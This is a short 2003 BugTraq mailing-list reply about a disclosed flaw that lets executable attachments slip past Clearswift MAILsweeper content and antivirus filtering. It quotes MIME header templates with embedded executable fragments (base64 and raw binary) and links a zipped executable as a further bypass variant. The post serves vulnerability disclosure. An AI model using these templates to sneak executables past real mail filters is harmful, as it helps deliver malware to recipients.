BugTraq
Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue Mar 11 2003 07:47PM
http-equiv (at) excite (dot) com [email concealed] (http-equiv malware com)


<!--

Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and
paste
in:

MIME-Version: 1.0
Content-Location:file:///executable.exe
Content-Transfer-Encoding: base64

TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-->

That's a very interesting situation with content filters and anti-
virus filters. How many others are affected one must wonder.

Try the following as well, nothing more than pure binary:

http://www.malware.com/bin.exe.zip

MIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZD  ! ÿÿu  ? >  û0jr y
?

Lot more where that came from.

End Call

--
http://www.malware.com

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus